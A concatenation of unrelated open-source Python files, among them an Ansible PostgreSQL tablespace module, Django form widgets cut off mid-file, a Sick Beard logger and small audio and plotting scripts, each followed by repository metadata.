= pyqtProperty(SceneStorageManager, getStorageManager, setStorageManager) def getImportStorageManager(self): return self._importStorageManager def setImportStorageManager(self, storageManager): self._importStorageManager = storageManager self._importStorageManager.setScene(self.scene) self._importStorageManager.setTools(self.tools) importStorageManager = pyqtProperty(SceneStorageManager, getImportStorageManager, setImportStorageManager) @property def loadAction(self): if self._loadAction: return self._loadAction self._loadAction = QAction('Load', self.getWidget(), shortcut = QKeySequence.Open) self._loadAction.triggered.connect(self.load) return self._loadAction 
@property def saveAction(self): if self._saveAction: return self._saveAction self._saveAction = QAction('Save', self.getWidget(), shortcut = QKeySequence.Save) self._saveAction.triggered.connect(self.save) return self._saveAction @property def importAction(self): if self._importAction: return self._importAction self._importAction = QAction('Import', self.getWidget()) self._importAction.triggered.connect(self.importScene) return self._importAction @property def exportAction(self): if self._exportAction: return self._exportAction self._exportAction = QAction('Export', self.getWidget()) self._exportAction.triggered.connect(self.exportScene) return self._exportAction def printScene(self, printer, painter=None): painter = painter if isinstance(painter, QPainter) else QPainter(printer) for finalizer in self._finalizers: finalizer.toFinalized(self.scene) pageItem = self._findPageItem() if pageItem: self.scene.render(painter, QRectF(), pageItem.boundingRect()) else: self.scene.render(painter) for finalizer in self._finalizers: finalizer.toEditable(self.scene) def showPrintPreviewDialog(self): margin = 30 parent = self.getWidget() self.printPrvDlg = QPrintPreviewDialog(parent) self.printPrvDlg.setWindowTitle(u'Druckvorschau') self.printPrvDlg.paintRequested.connect(self.printScene) self.printPrvDlg.resize(parent.width()-margin, parent.height()-margin) self.printPrvDlg.show() def deleteIfWanted(self): items = self.scene.selectedItems() if not len(items): return for item in items: self.scene.removeItem(item) @accepts(Finalizer) def addFinalizer(self, finalizer): self._finalizers.append(finalizer) def hasFinalizer(self, finalizer): return finalizer in self._finalizers def finalizer(self, cls): for finalizer in self._finalizers: if isinstance(finalizer, cls): return finalizer def _createTools(self): tools = GraphicsToolDispatcher(self) tools.setScene(self.scene) textTool = TextTool() tools.addTool(textTool) pixmapTool = PixmapTool() tools.addTool(pixmapTool) return tools def _populateActions(self): if self._actions: return self._actions.append(self.loadAction) self._actions.append(self.saveAction) self._actions.append(self.importAction) self._actions.append(self.exportAction) def _addActionsToWidget(self, widget): for action in self.actions(): widget.addAction(action) def _findPageItem(self): for item in self.scene.items(): if isinstance(item, PageItem): return item
mit
2,377,236,452,932,278,300
32.683962
110
0.67605
false
4.170561
false
false
false
pgmillon/ansible
lib/ansible/modules/database/postgresql/postgresql_tablespace.py
1
16280
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2017, Flavien Chantelot (@Dorn-) # Copyright: (c) 2018, Antoine Levy-Lambert (@antoinell) # Copyright: (c) 2019, Andrew Klychkov (@Andersson007) <aaklychkov@mail.ru> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'supported_by': 'community', 'status': ['preview'] } DOCUMENTATION = r''' --- module: postgresql_tablespace short_description: Add or remove PostgreSQL tablespaces from remote hosts description: - Adds or removes PostgreSQL tablespaces from remote hosts U(https://www.postgresql.org/docs/current/sql-createtablespace.html), U(https://www.postgresql.org/docs/current/manage-ag-tablespaces.html). version_added: '2.8' options: tablespace: description: - Name of the tablespace to add or remove. required: true type: str aliases: - name location: description: - Path to the tablespace directory in the file system. - Ensure that the location exists and has right privileges. type: path aliases: - path state: description: - Tablespace state. - I(state=present) implies the tablespace must be created if it doesn't exist. - I(state=absent) implies the tablespace must be removed if present. I(state=absent) is mutually exclusive with I(location), I(owner), i(set). - See the Notes section for information about check mode restrictions. type: str default: present choices: [ absent, present ] owner: description: - Name of the role to set as an owner of the tablespace. - If this option is not specified, the tablespace owner is a role that creates the tablespace. type: str set: description: - Dict of tablespace options to set. Supported from PostgreSQL 9.0. - For more information see U(https://www.postgresql.org/docs/current/sql-createtablespace.html). - When reset is passed as an option's value, if the option was set previously, it will be removed U(https://www.postgresql.org/docs/current/sql-altertablespace.html). type: dict rename_to: description: - New name of the tablespace. - The new name cannot begin with pg_, as such names are reserved for system tablespaces. session_role: description: - Switch to session_role after connecting. The specified session_role must be a role that the current login_user is a member of. - Permissions checking for SQL commands is carried out as though the session_role were the one that had logged in originally. type: str db: description: - Name of database to connect to and run queries against. type: str aliases: - login_db notes: - I(state=absent) and I(state=present) (the second one if the tablespace doesn't exist) do not support check mode because the corresponding PostgreSQL DROP and CREATE TABLESPACE commands can not be run inside the transaction block. 
author: - Flavien Chantelot (@Dorn-) - Antoine Levy-Lambert (@antoinell) - Andrew Klychkov (@Andersson007) extends_documentation_fragment: postgres ''' EXAMPLES = r''' - name: Create a new tablespace called acme and set bob as an its owner postgresql_tablespace: name: acme owner: bob location: /data/foo - name: Create a new tablespace called bar with tablespace options postgresql_tablespace: name: bar set: random_page_cost: 1 seq_page_cost: 1 - name: Reset random_page_cost option postgresql_tablespace: name: bar set: random_page_cost: reset - name: Rename the tablespace from bar to pcie_ssd postgresql_tablespace: name: bar rename_to: pcie_ssd - name: Drop tablespace called bloat postgresql_tablespace: name: bloat state: absent ''' RETURN = r''' queries: description: List of queries that was tried to be executed. returned: always type: str sample: [ "CREATE TABLESPACE bar LOCATION '/incredible/ssd'" ] tablespace: description: Tablespace name. returned: always type: str sample: 'ssd' owner: description: Tablespace owner. returned: always type: str sample: 'Bob' options: description: Tablespace options. returned: always type: dict sample: { 'random_page_cost': 1, 'seq_page_cost': 1 } location: description: Path to the tablespace in the file system. returned: always type: str sample: '/incredible/fast/ssd' newname: description: New tablespace name returned: if existent type: str sample: new_ssd state: description: Tablespace state at the end of execution. returned: always type: str sample: 'present' ''' try: from psycopg2 import __version__ as PSYCOPG2_VERSION from psycopg2.extras import DictCursor from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT as AUTOCOMMIT from psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED as READ_COMMITTED except ImportError: # psycopg2 is checked by connect_to_db() # from ansible.module_utils.postgres pass from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.database import pg_quote_identifier from ansible.module_utils.postgres import ( connect_to_db, exec_sql, get_conn_params, postgres_common_argument_spec, ) class PgTablespace(object): """Class for working with PostgreSQL tablespaces. 
Args: module (AnsibleModule) -- object of AnsibleModule class cursor (cursor) -- cursor object of psycopg2 library name (str) -- name of the tablespace Attrs: module (AnsibleModule) -- object of AnsibleModule class cursor (cursor) -- cursor object of psycopg2 library name (str) -- name of the tablespace exists (bool) -- flag the tablespace exists in the DB or not owner (str) -- tablespace owner location (str) -- path to the tablespace directory in the file system executed_queries (list) -- list of executed queries new_name (str) -- new name for the tablespace opt_not_supported (bool) -- flag indicates a tablespace option is supported or not """ def __init__(self, module, cursor, name): self.module = module self.cursor = cursor self.name = name self.exists = False self.owner = '' self.settings = {} self.location = '' self.executed_queries = [] self.new_name = '' self.opt_not_supported = False # Collect info: self.get_info() def get_info(self): """Get tablespace information.""" # Check that spcoptions exists: opt = exec_sql(self, "SELECT 1 FROM information_schema.columns " "WHERE table_name = 'pg_tablespace' " "AND column_name = 'spcoptions'", add_to_executed=False) # For 9.1 version and earlier: location = exec_sql(self, "SELECT 1 FROM information_schema.columns " "WHERE table_name = 'pg_tablespace' " "AND column_name = 'spclocation'", add_to_executed=False) if location: location = 'spclocation' else: location = 'pg_tablespace_location(t.oid)' if not opt: self.opt_not_supported = True query = ("SELECT r.rolname, (SELECT Null), %s " "FROM pg_catalog.pg_tablespace AS t " "JOIN pg_catalog.pg_roles AS r " "ON t.spcowner = r.oid " "WHERE t.spcname = '%s'" % (location, self.name)) else: query = ("SELECT r.rolname, t.spcoptions, %s " "FROM pg_catalog.pg_tablespace AS t " "JOIN pg_catalog.pg_roles AS r " "ON t.spcowner = r.oid " "WHERE t.spcname = '%s'" % (location, self.name)) res = exec_sql(self, query, add_to_executed=False) if not res: self.exists = False return False if res[0][0]: self.exists = True self.owner = res[0][0] if res[0][1]: # Options exist: for i in res[0][1]: i = i.split('=') self.settings[i[0]] = i[1] if res[0][2]: # Location exists: self.location = res[0][2] def create(self, location): """Create tablespace. Return True if success, otherwise, return False. args: location (str) -- tablespace directory path in the FS """ query = ("CREATE TABLESPACE %s LOCATION '%s'" % (pg_quote_identifier(self.name, 'database'), location)) return exec_sql(self, query, ddl=True) def drop(self): """Drop tablespace. Return True if success, otherwise, return False. """ return exec_sql(self, "DROP TABLESPACE %s" % pg_quote_identifier(self.name, 'database'), ddl=True) def set_owner(self, new_owner): """Set tablespace owner. Return True if success, otherwise, return False. args: new_owner (str) -- name of a new owner for the tablespace" """ if new_owner == self.owner: return False query = "ALTER TABLESPACE %s OWNER TO %s" % (pg_quote_identifier(self.name, 'database'), new_owner) return exec_sql(self, query, ddl=True) def rename(self, newname): """Rename tablespace. Return True if success, otherwise, return False. args: newname (str) -- new name for the tablespace" """ query = "ALTER TABLESPACE %s RENAME TO %s" % (pg_quote_identifier(self.name, 'database'), newname) self.new_name = newname return exec_sql(self, query, ddl=True) def set_settings(self, new_settings): """Set tablespace settings (options). If some setting has been changed, set changed = True. 
After all settings list is handling, return changed. args: new_settings (list) -- list of new settings """ # settings must be a dict {'key': 'value'} if self.opt_not_supported: return False changed = False # Apply new settings: for i in new_settings: if new_settings[i] == 'reset': if i in self.settings: changed = self.__reset_setting(i) self.settings[i] = None elif (i not in self.settings) or (str(new_settings[i]) != self.settings[i]): changed = self.__set_setting("%s = '%s'" % (i, new_settings[i])) return changed def __reset_setting(self, setting): """Reset tablespace setting. Return True if success, otherwise, return False. args: setting (str) -- string in format "setting_name = 'setting_value'" """ query = "ALTER TABLESPACE %s RESET (%s)" % (pg_quote_identifier(self.name, 'database'), setting) return exec_sql(self, query, ddl=True) def __set_setting(self, setting): """Set tablespace setting. Return True if success, otherwise, return False. args: setting (str) -- string in format "setting_name = 'setting_value'" """ query = "ALTER TABLESPACE %s SET (%s)" % (pg_quote_identifier(self.name, 'database'), setting) return exec_sql(self, query, ddl=True) # =========================================== # Module execution. # def main(): argument_spec = postgres_common_argument_spec() argument_spec.update( tablespace=dict(type='str', aliases=['name']), state=dict(type='str', default="present", choices=["absent", "present"]), location=dict(type='path', aliases=['path']), owner=dict(type='str'), set=dict(type='dict'), rename_to=dict(type='str'), db=dict(type='str', aliases=['login_db']), session_role=dict(type='str'), ) module = AnsibleModule( argument_spec=argument_spec, mutually_exclusive=(('positional_args', 'named_args'),), supports_check_mode=True, ) tablespace = module.params["tablespace"] state = module.params["state"] location = module.params["location"] owner = module.params["owner"] rename_to = module.params["rename_to"] settings = module.params["set"] if state == 'absent' and (location or owner or rename_to or settings): module.fail_json(msg="state=absent is mutually exclusive location, " "owner, rename_to, and set") conn_params = get_conn_params(module, module.params) db_connection = connect_to_db(module, conn_params, autocommit=True) cursor = db_connection.cursor(cursor_factory=DictCursor) # Change autocommit to False if check_mode: if module.check_mode: if PSYCOPG2_VERSION >= '2.4.2': db_connection.set_session(autocommit=False) else: db_connection.set_isolation_level(READ_COMMITTED) # Set defaults: autocommit = False changed = False ############## # Create PgTablespace object and do main job: tblspace = PgTablespace(module, cursor, tablespace) # If tablespace exists with different location, exit: if tblspace.exists and location and location != tblspace.location: module.fail_json(msg="Tablespace '%s' exists with different location '%s'" % (tblspace.name, tblspace.location)) # Create new tablespace: if not tblspace.exists and state == 'present': if rename_to: module.fail_json(msg="Tablespace %s does not exist, nothing to rename" % tablespace) if not location: module.fail_json(msg="'location' parameter must be passed with " "state=present if the tablespace doesn't exist") # Because CREATE TABLESPACE can not be run inside the transaction block: autocommit = True if PSYCOPG2_VERSION >= '2.4.2': db_connection.set_session(autocommit=True) else: db_connection.set_isolation_level(AUTOCOMMIT) changed = tblspace.create(location) # Drop non-existing tablespace: elif not tblspace.exists and state == 
'absent': # Nothing to do: module.fail_json(msg="Tries to drop nonexistent tablespace '%s'" % tblspace.name) # Drop existing tablespace: elif tblspace.exists and state == 'absent': # Because DROP TABLESPACE can not be run inside the transaction block: autocommit = True if PSYCOPG2_VERSION >= '2.4.2': db_connection.set_session(autocommit=True) else: db_connection.set_isolation_level(AUTOCOMMIT) changed = tblspace.drop() # Rename tablespace: elif tblspace.exists and rename_to: if tblspace.name != rename_to: changed = tblspace.rename(rename_to) if state == 'present': # Refresh information: tblspace.get_info() # Change owner and settings: if state == 'present' and tblspace.exists: if owner: changed = tblspace.set_owner(owner) if settings: changed = tblspace.set_settings(settings) tblspace.get_info() # Rollback if it's possible and check_mode: if not autocommit: if module.check_mode: db_connection.rollback() else: db_connection.commit() cursor.close() db_connection.close() # Make return values: kw = dict( changed=changed, state='present', tablespace=tblspace.name, owner=tblspace.owner, queries=tblspace.executed_queries, options=tblspace.settings, location=tblspace.location, ) if state == 'present': kw['state'] = 'present' if tblspace.new_name: kw['newname'] = tblspace.new_name elif state == 'absent': kw['state'] = 'absent' module.exit_json(**kw) if __name__ == '__main__': main()
gpl-3.0
-1,845,519,248,354,585,000
31.047244
120
0.615602
false
3.92952
false
false
false
inspirehep/invenio-formatter
invenio_formatter/models.py
1
1670
# -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2013, 2015 CERN. # # Invenio is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or (at your option) any later version. # # Invenio is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Invenio; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Database cache for formatter.""" from invenio_ext.sqlalchemy import db class Bibfmt(db.Model): """Represent a Bibfmt record.""" __tablename__ = 'bibfmt' id_bibrec = db.Column( db.MediumInteger(8, unsigned=True), nullable=False, server_default='0', primary_key=True, autoincrement=False) format = db.Column( db.String(10), nullable=False, server_default='', primary_key=True, index=True) kind = db.Column( db.String(10), nullable=False, server_default='', index=True ) last_updated = db.Column( db.DateTime, nullable=False, server_default='1900-01-01 00:00:00', index=True) value = db.Column(db.iLargeBinary) needs_2nd_pass = db.Column(db.TinyInteger(1), server_default='0') __all__ = ('Bibfmt', )
gpl-2.0
-1,471,349,621,209,438,200
26.377049
74
0.651497
false
3.8041
false
false
false
Polytechnique-org/xorgauth
xorgauth/accounts/migrations/0012_make_user_names_blank.py
1
1028
# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-01-04 13:41 from __future__ import unicode_literals from django.db import migrations, models import xorgauth.utils.fields class Migration(migrations.Migration): dependencies = [ ('accounts', '0011_make_user_ids_blank'), ] operations = [ migrations.AlterField( model_name='user', name='firstname', field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='first name'), ), migrations.AlterField( model_name='user', name='lastname', field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='last name'), ), migrations.AlterField( model_name='user', name='sex', field=models.CharField(blank=True, choices=[('male', 'Male'), ('female', 'Female')], max_length=6, null=True, verbose_name='sex'), ), ]
agpl-3.0
2,887,847,014,832,465,000
31.125
110
0.577821
false
4.063241
false
false
false
Souloist/Audio-Effects
Effects/Amplitude_Modulation/AM_example.py
1
1911
# Play a wave file with amplitude modulation. # Assumes wave file is mono. # This implementation reads and plays a one frame (sample) at a time (no blocking) """ Read a signal from a wave file, do amplitude modulation, play to output Original: pyrecplay_modulation.py by Gerald Schuller, Octtober 2013 Modified to read a wave file - Ivan Selesnick, September 2015 """ # f0 = 0 # Normal audio f0 = 400 # 'Duck' audio import pyaudio import struct import wave import math # Open wave file (mono) input_wavefile = 'author.wav' # input_wavefile = 'sin01_mono.wav' # input_wavefile = 'sin01_stereo.wav' wf = wave.open( input_wavefile, 'rb') RATE = wf.getframerate() WIDTH = wf.getsampwidth() LEN = wf.getnframes() CHANNELS = wf.getnchannels() print 'The sampling rate is {0:d} samples per second'.format(RATE) print 'Each sample is {0:d} bytes'.format(WIDTH) print 'The signal is {0:d} samples long'.format(LEN) print 'The signal has {0:d} channel(s)'.format(CHANNELS) # Open audio stream p = pyaudio.PyAudio() stream = p.open(format = p.get_format_from_width(WIDTH), channels = 1, rate = RATE, input = False, output = True) print('* Playing...') # Loop through wave file for n in range(0, LEN): # Get sample from wave file input_string = wf.readframes(1) # Convert binary string to tuple of numbers input_tuple = struct.unpack('h', input_string) # (h: two bytes per sample (WIDTH = 2)) # Use first value (of two if stereo) input_value = input_tuple[0] # Amplitude modulation (f0 Hz cosine) output_value = input_value * math.cos(2*math.pi*f0*n/RATE) # Convert value to binary string output_string = struct.pack('h', output_value) # Write binary string to audio output stream stream.write(output_string) print('* Done') stream.stop_stream() stream.close() p.terminate()
mit
-6,821,632,004,709,263,000
26.695652
82
0.6719
false
3.255537
false
false
false
mattpitkin/GraWIToNStatisticsLectures
figures/scripts/pvalue.py
1
1242
#!/usr/bin/env python """ Make plots showing how to calculate the p-value """ import matplotlib.pyplot as pl from scipy.stats import norm from scipy.special import erf import numpy as np mu = 0. # the mean, mu sigma = 1. # standard deviation x = np.linspace(-4, 4, 1000) # x # set plot to render labels using latex pl.rc('text', usetex=True) pl.rc('font', family='serif') pl.rc('font', size=14) fig = pl.figure(figsize=(7,4), dpi=100) # value of x for calculating p-value Z = 1.233 y = norm.pdf(x, mu, sigma) # plot pdfs pl.plot(x, y, 'r') pl.plot([-Z, -Z], [0., np.max(y)], 'k--') pl.plot([Z, Z], [0., np.max(y)], 'k--') pl.fill_between(x, np.zeros(len(x)), y, where=x<=-Z, facecolor='green', interpolate=True, alpha=0.6) pl.fill_between(x, np.zeros(len(x)), y, where=x>=Z, facecolor='green', interpolate=True, alpha=0.6) pvalue = 1.-erf(Z/np.sqrt(2.)) ax = pl.gca() ax.set_xlabel('$Z$', fontsize=14) ax.set_ylabel('$p(Z)$', fontsize=14) ax.set_xlim(-4, 4) ax.grid(True) ax.text(Z+0.1, 0.3, '$Z_{\\textrm{obs}} = 1.233$', fontsize=16) ax.text(-3.6, 0.31, '$p$-value$= %.2f$' % pvalue, fontsize=18, bbox={'facecolor': 'none', 'pad':12, 'ec': 'r'}) fig.subplots_adjust(bottom=0.15) pl.savefig('../pvalue.pdf') pl.show()
mit
2,189,113,514,410,378,800
22.884615
100
0.625604
false
2.425781
false
false
false
mozvip/Sick-Beard
sickbeard/logger.py
1
6374
# Author: Nic Wolfe <nic@wolfeden.ca> # URL: http://code.google.com/p/sickbeard/ # # This file is part of Sick Beard. # # Sick Beard is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Sick Beard is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Sick Beard. If not, see <http://www.gnu.org/licenses/>. from __future__ import with_statement import os import threading import logging import sickbeard from sickbeard import classes # number of log files to keep NUM_LOGS = 3 # log size in bytes LOG_SIZE = 10000000 # 10 megs ERROR = logging.ERROR WARNING = logging.WARNING MESSAGE = logging.INFO DEBUG = logging.DEBUG reverseNames = {u'ERROR': ERROR, u'WARNING': WARNING, u'INFO': MESSAGE, u'DEBUG': DEBUG} class SBRotatingLogHandler(object): def __init__(self, log_file, num_files, num_bytes): self.num_files = num_files self.num_bytes = num_bytes self.log_file = log_file self.cur_handler = None self.writes_since_check = 0 self.log_lock = threading.Lock() def initLogging(self, consoleLogging=True): self.log_file = os.path.join(sickbeard.LOG_DIR, self.log_file) self.cur_handler = self._config_handler() logging.getLogger('sickbeard').addHandler(self.cur_handler) logging.getLogger('subliminal').addHandler(self.cur_handler) # define a Handler which writes INFO messages or higher to the sys.stderr if consoleLogging: console = logging.StreamHandler() console.setLevel(logging.INFO) # set a format which is simpler for console use console.setFormatter(logging.Formatter('%(asctime)s %(levelname)s::%(message)s', '%H:%M:%S')) # add the handler to the root logger logging.getLogger('sickbeard').addHandler(console) logging.getLogger('subliminal').addHandler(console) logging.getLogger('sickbeard').setLevel(logging.DEBUG) logging.getLogger('subliminal').setLevel(logging.ERROR) def _config_handler(self): """ Configure a file handler to log at file_name and return it. """ file_handler = logging.FileHandler(self.log_file) file_handler.setLevel(logging.DEBUG) file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', '%b-%d %H:%M:%S')) return file_handler def _log_file_name(self, i): """ Returns a numbered log file name depending on i. If i==0 it just uses logName, if not it appends it to the extension (blah.log.3 for i == 3) i: Log number to ues """ return self.log_file + ('.' + str(i) if i else '') def _num_logs(self): """ Scans the log folder and figures out how many log files there are already on disk Returns: The number of the last used file (eg. mylog.log.3 would return 3). 
If there are no logs it returns -1 """ cur_log = 0 while os.path.isfile(self._log_file_name(cur_log)): cur_log += 1 return cur_log - 1 def _rotate_logs(self): sb_logger = logging.getLogger('sickbeard') subli_logger = logging.getLogger('subliminal') # delete the old handler if self.cur_handler: self.cur_handler.flush() self.cur_handler.close() sb_logger.removeHandler(self.cur_handler) subli_logger.removeHandler(self.cur_handler) # rename or delete all the old log files for i in range(self._num_logs(), -1, -1): cur_file_name = self._log_file_name(i) try: if i >= NUM_LOGS: os.remove(cur_file_name) else: os.rename(cur_file_name, self._log_file_name(i+1)) except WindowsError: pass # the new log handler will always be on the un-numbered .log file new_file_handler = self._config_handler() self.cur_handler = new_file_handler sb_logger.addHandler(new_file_handler) subli_logger.addHandler(new_file_handler) def log(self, toLog, logLevel=MESSAGE): with self.log_lock: # check the size and see if we need to rotate if self.writes_since_check >= 10: if os.path.isfile(self.log_file) and os.path.getsize(self.log_file) >= LOG_SIZE: self._rotate_logs() self.writes_since_check = 0 else: self.writes_since_check += 1 meThread = threading.currentThread().getName() message = meThread + u" :: " + toLog out_line = message.encode('utf-8') sb_logger = logging.getLogger('sickbeard') try: if logLevel == DEBUG: sb_logger.debug(out_line) elif logLevel == MESSAGE: sb_logger.info(out_line) elif logLevel == WARNING: sb_logger.warning(out_line) elif logLevel == ERROR: sb_logger.error(out_line) # add errors to the UI logger classes.ErrorViewer.add(classes.UIError(message)) else: sb_logger.log(logLevel, out_line) except ValueError: pass sb_log_instance = SBRotatingLogHandler('sickbeard.log', NUM_LOGS, LOG_SIZE) def log(toLog, logLevel=MESSAGE): sb_log_instance.log(toLog, logLevel)
gpl-3.0
-7,407,349,847,844,336,000
32.464865
118
0.568089
false
4.067645
false
false
false
c2corg/v6_api
c2corg_api/search/mappings/image_mapping.py
1
1144
from c2corg_api.models.image import IMAGE_TYPE, Image from c2corg_api.search.mapping import SearchDocument, BaseMeta from c2corg_api.search.mapping_types import QueryableMixin, QEnumArray, \ QInteger, QDate class SearchImage(SearchDocument): class Meta(BaseMeta): doc_type = IMAGE_TYPE activities = QEnumArray( 'act', model_field=Image.activities) categories = QEnumArray( 'cat', model_field=Image.categories) image_type = QEnumArray( 'ityp', model_field=Image.image_type) elevation = QInteger( 'ialt', range=True) date_time = QDate('idate', 'date_time') FIELDS = [ 'activities', 'categories', 'image_type', 'elevation', 'date_time' ] @staticmethod def to_search_document(document, index): search_document = SearchDocument.to_search_document(document, index) if document.redirects_to: return search_document SearchDocument.copy_fields( search_document, document, SearchImage.FIELDS) return search_document SearchImage.queryable_fields = QueryableMixin.get_queryable_fields(SearchImage)
agpl-3.0
6,425,518,314,371,161,000
29.105263
79
0.681818
false
3.726384
false
false
false
ar4s/django
django/forms/widgets.py
1
32506
""" HTML Widget classes """ from __future__ import unicode_literals import copy from itertools import chain import warnings from django.conf import settings from django.forms.utils import flatatt, to_current_timezone from django.utils.datastructures import MultiValueDict, MergeDict from django.utils.html import conditional_escape, format_html from django.utils.translation import ugettext_lazy from django.utils.encoding import force_text, python_2_unicode_compatible from django.utils.safestring import mark_safe from django.utils import datetime_safe, formats, six from django.utils.six.moves.urllib.parse import urljoin __all__ = ( 'Media', 'MediaDefiningClass', 'Widget', 'TextInput', 'EmailInput', 'URLInput', 'NumberInput', 'PasswordInput', 'HiddenInput', 'MultipleHiddenInput', 'ClearableFileInput', 'FileInput', 'DateInput', 'DateTimeInput', 'TimeInput', 'Textarea', 'CheckboxInput', 'Select', 'NullBooleanSelect', 'SelectMultiple', 'RadioSelect', 'CheckboxSelectMultiple', 'MultiWidget', 'SplitDateTimeWidget', 'SplitHiddenDateTimeWidget', ) MEDIA_TYPES = ('css','js') @python_2_unicode_compatible class Media(object): def __init__(self, media=None, **kwargs): if media: media_attrs = media.__dict__ else: media_attrs = kwargs self._css = {} self._js = [] for name in MEDIA_TYPES: getattr(self, 'add_' + name)(media_attrs.get(name, None)) # Any leftover attributes must be invalid. # if media_attrs != {}: # raise TypeError("'class Media' has invalid attribute(s): %s" % ','.join(media_attrs.keys())) def __str__(self): return self.render() def render(self): return mark_safe('\n'.join(chain(*[getattr(self, 'render_' + name)() for name in MEDIA_TYPES]))) def render_js(self): return [format_html('<script type="text/javascript" src="{0}"></script>', self.absolute_path(path)) for path in self._js] def render_css(self): # To keep rendering order consistent, we can't just iterate over items(). # We need to sort the keys, and iterate over the sorted list. 
media = sorted(self._css.keys()) return chain(*[ [format_html('<link href="{0}" type="text/css" media="{1}" rel="stylesheet" />', self.absolute_path(path), medium) for path in self._css[medium]] for medium in media]) def absolute_path(self, path, prefix=None): if path.startswith(('http://', 'https://', '/')): return path if prefix is None: if settings.STATIC_URL is None: # backwards compatibility prefix = settings.MEDIA_URL else: prefix = settings.STATIC_URL return urljoin(prefix, path) def __getitem__(self, name): "Returns a Media object that only contains media of the given type" if name in MEDIA_TYPES: return Media(**{str(name): getattr(self, '_' + name)}) raise KeyError('Unknown media type "%s"' % name) def add_js(self, data): if data: for path in data: if path not in self._js: self._js.append(path) def add_css(self, data): if data: for medium, paths in data.items(): for path in paths: if not self._css.get(medium) or path not in self._css[medium]: self._css.setdefault(medium, []).append(path) def __add__(self, other): combined = Media() for name in MEDIA_TYPES: getattr(combined, 'add_' + name)(getattr(self, '_' + name, None)) getattr(combined, 'add_' + name)(getattr(other, '_' + name, None)) return combined def media_property(cls): def _media(self): # Get the media property of the superclass, if it exists sup_cls = super(cls, self) try: base = sup_cls.media except AttributeError: base = Media() # Get the media definition for this class definition = getattr(cls, 'Media', None) if definition: extend = getattr(definition, 'extend', True) if extend: if extend == True: m = base else: m = Media() for medium in extend: m = m + base[medium] return m + Media(definition) else: return Media(definition) else: return base return property(_media) class MediaDefiningClass(type): "Metaclass for classes that can have media definitions" def __new__(cls, name, bases, attrs): new_class = super(MediaDefiningClass, cls).__new__(cls, name, bases, attrs) if 'media' not in attrs: new_class.media = media_property(new_class) return new_class @python_2_unicode_compatible class SubWidget(object): """ Some widgets are made of multiple HTML elements -- namely, RadioSelect. This is a class that represents the "inner" HTML element of a widget. """ def __init__(self, parent_widget, name, value, attrs, choices): self.parent_widget = parent_widget self.name, self.value = name, value self.attrs, self.choices = attrs, choices def __str__(self): args = [self.name, self.value, self.attrs] if self.choices: args.append(self.choices) return self.parent_widget.render(*args) class Widget(six.with_metaclass(MediaDefiningClass)): is_hidden = False # Determines whether this corresponds to an <input type="hidden">. needs_multipart_form = False # Determines does this widget need multipart form is_localized = False is_required = False def __init__(self, attrs=None): if attrs is not None: self.attrs = attrs.copy() else: self.attrs = {} def __deepcopy__(self, memo): obj = copy.copy(self) obj.attrs = self.attrs.copy() memo[id(self)] = obj return obj def subwidgets(self, name, value, attrs=None, choices=()): """ Yields all "subwidgets" of this widget. Used only by RadioSelect to allow template access to individual <input type="radio"> buttons. Arguments are the same as for render(). """ yield SubWidget(self, name, value, attrs, choices) def render(self, name, value, attrs=None): """ Returns this Widget rendered as HTML, as a Unicode string. 
The 'value' given is not guaranteed to be valid input, so subclass implementations should program defensively. """ raise NotImplementedError('subclasses of Widget must provide a render() method') def build_attrs(self, extra_attrs=None, **kwargs): "Helper function for building an attribute dictionary." attrs = dict(self.attrs, **kwargs) if extra_attrs: attrs.update(extra_attrs) return attrs def value_from_datadict(self, data, files, name): """ Given a dictionary of data and this widget's name, returns the value of this widget. Returns None if it's not provided. """ return data.get(name, None) def id_for_label(self, id_): """ Returns the HTML ID attribute of this Widget for use by a <label>, given the ID of the field. Returns None if no ID is available. This hook is necessary because some widgets have multiple HTML elements and, thus, multiple IDs. In that case, this method should return an ID value that corresponds to the first ID in the widget's tags. """ return id_ class Input(Widget): """ Base class for all <input> widgets (except type='checkbox' and type='radio', which are special). """ input_type = None # Subclasses must define this. def _format_value(self, value): if self.is_localized: return formats.localize_input(value) return value def render(self, name, value, attrs=None): if value is None: value = '' final_attrs = self.build_attrs(attrs, type=self.input_type, name=name) if value != '': # Only add the 'value' attribute if a value is non-empty. final_attrs['value'] = force_text(self._format_value(value)) return format_html('<input{0} />', flatatt(final_attrs)) class TextInput(Input): input_type = 'text' def __init__(self, attrs=None): if attrs is not None: self.input_type = attrs.pop('type', self.input_type) super(TextInput, self).__init__(attrs) class NumberInput(TextInput): input_type = 'number' class EmailInput(TextInput): input_type = 'email' class URLInput(TextInput): input_type = 'url' class PasswordInput(TextInput): input_type = 'password' def __init__(self, attrs=None, render_value=False): super(PasswordInput, self).__init__(attrs) self.render_value = render_value def render(self, name, value, attrs=None): if not self.render_value: value=None return super(PasswordInput, self).render(name, value, attrs) class HiddenInput(Input): input_type = 'hidden' is_hidden = True class MultipleHiddenInput(HiddenInput): """ A widget that handles <input type="hidden"> for fields that have a list of values. """ def __init__(self, attrs=None, choices=()): super(MultipleHiddenInput, self).__init__(attrs) # choices can be any iterable self.choices = choices def render(self, name, value, attrs=None, choices=()): if value is None: value = [] final_attrs 